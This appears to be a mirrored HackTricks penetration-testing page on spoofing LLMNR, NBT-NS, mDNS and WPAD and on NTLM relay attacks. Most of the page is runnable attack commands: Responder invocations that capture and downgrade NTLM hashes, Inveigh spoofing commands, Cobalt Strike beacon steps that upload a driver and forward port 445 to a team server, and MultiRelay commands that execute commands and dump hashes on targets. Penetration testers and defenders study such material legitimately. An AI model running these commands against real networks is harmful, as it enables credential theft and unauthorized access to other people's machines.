mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-05 01:38:51 +00:00
150 lines
9 KiB
Markdown
150 lines
9 KiB
Markdown
# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
## Network Protocols
|
|
|
|
### Local Host Resolution Protocols
|
|
- **LLMNR, NBT-NS, and mDNS**:
|
|
- Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS.
|
|
- These protocols are susceptible to interception and spoofing due to their unauthenticated, broadcast nature over UDP.
|
|
- [Responder](https://github.com/lgandx/Responder) can be used to impersonate services by sending forged responses to hosts querying these protocols.
|
|
- Further information on service impersonation using Responder can be found [here](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
|
|
|
|
### Web Proxy Auto-Discovery Protocol (WPAD)
|
|
- WPAD allows browsers to discover proxy settings automatically.
|
|
- Discovery is facilitated via DHCP, DNS, or fallback to LLMNR and NBT-NS if DNS fails.
|
|
- Responder can automate WPAD attacks, directing clients to malicious WPAD servers.
|
|
|
|
### Responder for Protocol Poisoning
|
|
- **Responder** is a tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.
|
|
- It comes pre-installed in Kali Linux, configurable at `/etc/responder/Responder.conf`.
|
|
- Responder displays captured hashes on the screen and saves them in the `/usr/share/responder/logs` directory.
|
|
- It supports both IPv4 and IPv6.
|
|
- Windows version of Responder is available [here](https://github.com/lgandx/Responder-Windows).
|
|
|
|
#### Running Responder
|
|
- To run Responder with default settings: `responder -I <Interface>`
|
|
- For more aggressive probing (with potential side effects): `responder -I <Interface> -P -r -v`
|
|
- Techniques to capture NTLMv1 challenges/responses for easier cracking: `responder -I <Interface> --lm --disable-ess`
|
|
- WPAD impersonation can be activated with: `responder -I <Interface> --wpad`
|
|
- NetBIOS requests can be resolved to the attacker's IP, and an authentication proxy can be set up: `responder.py -I <interface> -Pv`
|
|
|
|
### DHCP Poisoning with Responder
|
|
- Spoofing DHCP responses can permanently poison a victim's routing information, offering a stealthier alternative to ARP poisoning.
|
|
- It requires precise knowledge of the target network's configuration.
|
|
- Running the attack: `./Responder.py -I eth0 -Pdv`
|
|
- This method can effectively capture NTLMv1/2 hashes, but it requires careful handling to avoid network disruption.
|
|
|
|
### Capturing Credentials with Responder
|
|
- Responder will impersonate services using the above-mentioned protocols, capturing credentials (usually NTLMv2 Challenge/Response) when a user attempts to authenticate against the spoofed services.
|
|
- Attempts can be made to downgrade to NetNTLMv1 or disable ESS for easier credential cracking.
|
|
|
|
It's crucial to note that employing these techniques should be done legally and ethically, ensuring proper authorization and avoiding disruption or unauthorized access.
|
|
|
|
## Inveigh
|
|
|
|
Inveigh is a tool for penetration testers and red teamers, designed for Windows systems. It offers functionalities similar to Responder, performing spoofing and man-in-the-middle attacks. The tool has evolved from a PowerShell script to a C# binary, with [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) and [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as the main versions. Detailed parameters and instructions can be found in the [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
|
|
|
|
Inveigh can be operated through PowerShell:
|
|
|
|
```powershell
|
|
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
|
|
```
|
|
|
|
Or executed as a C# binary:
|
|
```bash
|
|
Inveigh.exe
|
|
```
|
|
|
|
### NTLM Relay Attack
|
|
|
|
This attack leverages SMB authentication sessions to access a target machine, granting a system shell if successful. Key prerequisites include:
|
|
- The authenticating user must have Local Admin access on the relayed host.
|
|
- SMB signing should be disabled.
|
|
|
|
#### 445 Port Forwarding and Tunneling
|
|
|
|
In scenarios where direct network introduction isn't feasible, traffic on port 445 needs to be forwarded and tunneled. Tools like [**PortBender**](https://github.com/praetorian-inc/PortBender) help in redirecting port 445 traffic to another port, which is essential when local admin access is available for driver loading.
|
|
|
|
PortBender setup and operation in Cobalt Strike:
|
|
```bash
|
|
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
|
|
|
|
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
|
|
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
|
|
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
|
|
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
|
|
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
|
|
|
|
# Termination commands
|
|
beacon> jobs
|
|
beacon> jobkill 0
|
|
beacon> rportfwd stop 8445
|
|
beacon> socks stop
|
|
```
|
|
|
|
### Other Tools for NTLM Relay Attack
|
|
|
|
- **Metasploit**: Set up with proxies, local and remote host details.
|
|
- **smbrelayx**: A Python script for relaying SMB sessions and executing commands or deploying backdoors.
|
|
- **MultiRelay**: A tool from the Responder suite to relay specific users or all users, execute commands, or dump hashes.
|
|
|
|
Each tool can be configured to operate through a SOCKS proxy if necessary, enabling attacks even with indirect network access.
|
|
|
|
### MultiRelay Operation
|
|
|
|
MultiRelay is executed from the _**/usr/share/responder/tools**_ directory, targeting specific IPs or users.
|
|
```bash
|
|
python MultiRelay.py -t <IP target> -u ALL # Relay all users
|
|
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
|
|
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
|
|
|
|
# Proxychains for routing traffic
|
|
```
|
|
|
|
These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments.
|
|
|
|
### Force NTLM Logins
|
|
|
|
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
|
|
|
|
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
|
|
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
|
|
{% endcontent-ref %}
|
|
|
|
## References
|
|
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
|
|
* [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
|
|
* [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
|
|
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
|
|
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
|
|
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|